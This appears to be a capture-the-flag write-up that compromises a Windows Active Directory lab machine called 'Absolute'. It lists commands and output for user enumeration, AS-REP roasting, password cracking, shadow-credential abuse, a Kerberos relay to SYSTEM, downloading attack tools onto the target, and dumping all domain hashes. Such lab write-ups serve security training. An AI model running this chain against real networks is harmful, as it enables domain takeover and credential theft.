Scanning
> TARGET=10.129.49.253 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Absolute
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-09-26 16:21:27Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49671/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49678/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49679/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49685/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49690/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49700/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49704/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
53183/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Finding usernames
- Using kerbrute to find usernames
> kerbrute userenum --dc absolute.htb -d absolute.htb /usr/share/wordlists/kerberos_enum_userlists/A-Z.Surnames.txt
2022/09/26 16:19:30 > [+] VALID USERNAME: J.ROBERTS@absolute.htb
2022/09/26 16:19:30 > [+] VALID USERNAME: J.ROBINSON@absolute.htb
2022/09/26 16:20:36 > [+] VALID USERNAME: L.MOORE@absolute.htb
2022/09/26 16:21:38 > [+] VALID USERNAME: N.SMITH@absolute.htb
2022/09/26 16:24:20 > [+] VALID USERNAME: S.JOHNSON@absolute.htb
- usernames can also be found from the meta data of the uploaded pictures
> wget http://absolute.htb/images/hero_1.jpg
> exiftool hero_1.jpg
Author : James Roberts
- Using this method, the following usernames can be found, we reformat them to the above found form
James Roberts J.ROBERTS@absolute.htb
Michael Chaffrey M.Chaffrey@absolute.htb
Donald Klay D.Klay@absolute.htb
Sarah Osvald S.Osvald@absolute.htb
Jeffer Robinson J.Robinson@absolute.htb
- Compile the found usernames into a users.txt file
ASREP Roasting
- Perform ASREP Roasting to get ticket hashes, found a ticket hash for
D.Klay
> impacket-GetNPUsers absolute.htb/ -no-pass -usersfile users.txt
$krb5asrep$23$D.Klay@absolute.htb@ABSOLUTE.HTB:46bea6d8a1effd22bc2c5284d78ba055$954732a125e1d0eac34eb6899bcc92d0af0d9f00f3a79b3166955d5dd4832755edffcb8c50dfda56c9b0fde3862158c6cc3d8abcc979fbd3d04813f0d15bf48bb98e6f0ab365493f8dc57e37ec96fbbd3771c0ecdc9ed11dd95a06b6e0eb1e090219968c55432439e225d8eb4577a3509e1e4fa2234344548095bc7ade600abd8fb639e181cb3359dc753060c22e9d105b3df2e6cff74bfd320b1d5485a55ed6a5c2951962eb0910eaf0c9a10d8d76392006b4e4764d86364a9a64e5534addb464d9d87ed7ea2644d49ead89dfb30eb2a90e6032178646a304b4ea5f2b1e319dba05d8d741dcaa82b792f891
- Crack the hash using hashcat,
Darkmoonsky248girl
> hashcat -m18200 $krb5asrep$23$D.Klay@absolute.htb@ABSOLUTE.HTB:<hash>$<hash> rockyou.txt
- Request for a silver ticket for kerberos auth
> ntpdate -s absolute.htb && impacket-getTGT 'absolute.htb/d.klay:Darkmoonsky248girl'
> export KRB5CCNAME=d.klay.ccache
# If you encountered this error KRB_AP_ERR_SKEW, that means your machine is out of sync with the dc's time. So, needs to disable your machine's auto time update and re-sync with the target dc
> timedatectl set-ntp false
> ntpdate -s absolute.htb
Getting smb service and pass
> ~/tools/cme/cme ldap -u d.klay -d absolute.htb -k --kdcHost dc.absolute.htb --users 10.129.49.253
SMB 10.129.49.253 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
LDAP 10.129.49.253 389 DC [+] absolute.htb\
LDAP 10.129.49.253 389 DC [*] Total of records returned 20
LDAP 10.129.49.253 389 DC Administrator Built-in account for administering the computer/domain
LDAP 10.129.49.253 389 DC Guest Built-in account for guest access to the computer/domain
LDAP 10.129.49.253 389 DC krbtgt Key Distribution Center Service Account
LDAP 10.129.49.253 389 DC J.Roberts
LDAP 10.129.49.253 389 DC M.Chaffrey
LDAP 10.129.49.253 389 DC D.Klay
LDAP 10.129.49.253 389 DC s.osvald
LDAP 10.129.49.253 389 DC j.robinson
LDAP 10.129.49.253 389 DC n.smith
LDAP 10.129.49.253 389 DC m.lovegod
LDAP 10.129.49.253 389 DC l.moore
LDAP 10.129.49.253 389 DC c.colt
LDAP 10.129.49.253 389 DC s.johnson
LDAP 10.129.49.253 389 DC d.lemm
LDAP 10.129.49.253 389 DC svc_smb AbsoluteSMBService123!
LDAP 10.129.49.253 389 DC svc_audit
LDAP 10.129.49.253 389 DC winrm_user Used to perform simple network tasks
- Now, we have a service account
svc_smb:AbsoluteSMBService123!, login via smb and get the shared files
> impacket-getTGT 'absolute.htb/svc_smb:AbsoluteSMBService123!'
> export KRB5CCNAME=svc_smb.ccache
> impacket-smbclient svc_smb@dc.absolute.htb -k -no-pass
# use shared
# ls
drw-rw-rw- 0 Thu Sep 1 13:02:23 2022 .
drw-rw-rw- 0 Thu Sep 1 13:02:23 2022 ..
-rw-rw-rw- 72 Thu Sep 1 13:02:23 2022 compiler.sh
-rw-rw-rw- 67584 Thu Sep 1 13:02:23 2022 test.exe
# get compiler.sh
# get test.exe
Getting credential from test.exe
- Get the test.exe file and run it on a windows machine with vpn connected. Then run wireshark to capture the request, see the following captured info. Found new credential:
absolute.htb\m.lovegod:AbsoluteLDAP2022!
0....6...`....-.....absolute.htb\mlovegod..AbsoluteLDAP2022!0....h...a...._
.1...X80090308: LdapErr: DSID-0C090439, comment: AcceptSecurityContext error, data 52e, v4563.0........B.
- Request for a silver ticket for kerberos auth
> ntpdate -s absolute.htb && impacket-getTGT absolute.htb/m.lovegod:AbsoluteLDAP2022!
> export KRB5CCNAME=m.lovegod.ccache
- From ldap enum using python, only the following auth types are supported: GSSAPI, GSS-SPNEGO, EXTERNAL, DIGEST-MD5. However, the official bloodhound-python doesn’t support kerberos yet. Hence, this fork was used instead: https://github.com/jazzpizazz/BloodHound.py-Kerberos
> python3 ~/tools/BloodHound.py-Kerberos/bloodhound.py -u m.lovegod -k -d absolute.htb -dc dc.absolute.htb -ns 10.129.49.253 --dns-tcp --zip -no-pass -c All
- From the collected info, we learnt that: m.lovegod – owns –> Group Network Audit – Generic Write –> winrm_user
User: winrm_user
- Setup a Windows Server, i used 2019
- Install ActiveDirectory module
- Add hosts file entry for absolute.htb, DO NOT add dc.absolute.htb, let it resolve itself.
- Change internet time server to absolute.htb
- Chagen network adatpr DNS server to the target DC IP
- Then run the followings, make it quick! the DC resets AD values very regularly, prepare thing in a copy & paste ready manner
- On Windows Server, add the user m.lovegod to the “Network Audit” group
$dc_domain="ABSOLUTE.HTB"
$SecPassword = ConvertTo-SecureString "AbsoluteLDAP2022!" -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('ABSOLUTE.HTB\m.lovegod', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Network Audit" -Rights all -DomainController DC.ABSOLUTE.HTB -principalidentity "m.lovegod"
Add-ADPrincipalGroupMembership -Identity m.lovegod -MemberOf 'Network Audit' -Credential $Cred -Server DC.ABSOLUTE.HTB
Get-DomainGroupMember -Identity 'network audit' -Domain $dc_domain -DomainController DC.ABSOLUTE.HTB -Credential $cred
ntpdate -s absolute.htb && impacket-getTGT absolute.htb/m.lovegod:AbsoluteLDAP2022!
export KRB5CCNAME=m.lovegod.ccache
python3 ~/tools/pywhisker/pywhisker.py -d absolute.htb -u "m.lovegod" -k --no-pass -t "winrm_user" --action "add"
- The above pywhisker command should generate a pfx file and a password. Then use the PKINITtools to get a ticket using the pfx:
python3 ~/tools/PKINITtools/gettgtpkinit.py absolute.htb/winrm_user -cert-pfx <pfx> -pfx-pass <password> winrm_user_ccache
- Note there is a ccache generated for winrm_user. Then edit the /etc/krb5.conf file to make sure everything is in CAPS.
# Ensure the realms in /etc/krb5.conf are in UPPERCASE
[libdefaults]
default_realm = ABSOLUTE.HTB
[realms]
ABSOLUTE.HTB = {
kdc = DC.ABSOLUTE.HTB
admin_server = ABSOLUTE.HTB
}
- Use evil-winrm with the ccahe file to get a shell
> export KRB5CCNAME=winrm_user_ccache
> ntpdate -s absolute.htb && evil-winrm -i DC.ABSOLUTE.HTB -r ABSOLUTE.HTB
PE
# download and compile the three tools and upload to the target
# https://github.com/cube0x0/KrbRelay
# https://github.com/antonioCoco/RunasCs
# https://github.com/GhostPack/Rubeus/
> wget http://<ip>/KrbRelay.exe -O .\KrbRelay.exe
> wget http://<ip>/RunasCs_net4.exe -O .\RunasCs_net4.exe
> wget http://<ip>/Rubeus.exe -O .\Rubeus.exe
- Using the uploaded tools to relay the requests to COM server as SYSTEM
> C:\Users\winrm_user\Documents\RunasCs_net4.exe m.lovegod 'AbsoluteLDAP2022!' -d absolute.htb -l 9 "C:\Users\winrm_user\Documents\KrbRelay.exe -spn ldap/dc.absolute.htb -clsid {752073A1-23F2-4396-85F0-8FDB879ED0ED} -shadowcred"
[*] Relaying context: absolute.htb\DC$
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\Users\winrm_user\Documents\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAAAY0+0+5iDfgbHK2kd8FI2iApgAAJwW//+08pB7XXrT8SIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:
[*] Forcing SYSTEM authentication
[*] Using CLSID: 752073a1-23f2-4396-85f0-8fdb879ed0ed
[*] apReq: <apReq>
[*] bind: 0
[*] ldap_get_option: LDAP_SASL_BIND_IN_PROGRESS
[*] apRep1: <apRep1>
[*] AcceptSecurityContext: SEC_I_CONTINUE_NEEDED
[*] fContextReq: Delegate, MutualAuth, UseDceStyle, Connection
[*] apRep2: <apRep2>
[*] bind: 0
[*] ldap_get_option: LDAP_SUCCESS
[+] LDAP session established
[*] ldap_modify: LDAP_SUCCESS
Rubeus.exe asktgt /user:DC$ /certificate:<cert> /password:"<pass>" /getcredentials /show
- This will generate a Rubeus.exe command, execute it to get an NTLM hash for the DC$
> .\Rubeus.exe asktgt /user:DC$ /certificate:<cert> /password:"<pass>" /getcredentials /show
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=DC$
[*] Building AS-REQ (w/ PKINIT preauth) for: 'absolute.htb\DC$'
[+] TGT request successful!
[*] base64(ticket.kirbi):
<base64-ticket>
ServiceName : krbtgt/absolute.htb
ServiceRealm : ABSOLUTE.HTB
UserName : DC$
UserRealm : ABSOLUTE.HTB
StartTime : 9/30/2022 7:46:17 AM
EndTime : 9/30/2022 5:46:17 PM
RenewTill : 10/7/2022 7:46:17 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : yHrqDFTj1Zwc3W8/QBNKDg==
ASREP (key) : F99EF936A3999F80D62AC070288A3D00
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : A7864AB463177ACB9AEC553F18F42577
- Keep a note of the NTLM hash and use secretsdump to get all hashes on the DC$
> python3 ~/tools/impacket-dacledit/examples/secretsdump.py -hashes :<ntlm> 'DC$@ABSOLUTE.HTB'
Impacket v0.9.25.dev1 - Copyright 2021 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator\Administrator:500:aad3b435b51404eeaad3b435b51404ee:<ntlm>:::
...
[*] Cleaning up...
- Login via evil-winrm using the admin hash to fetch the root flag
> evil-winrm -i DC.ABSOLUTE.HTB -u Administrator -H <ntlm>
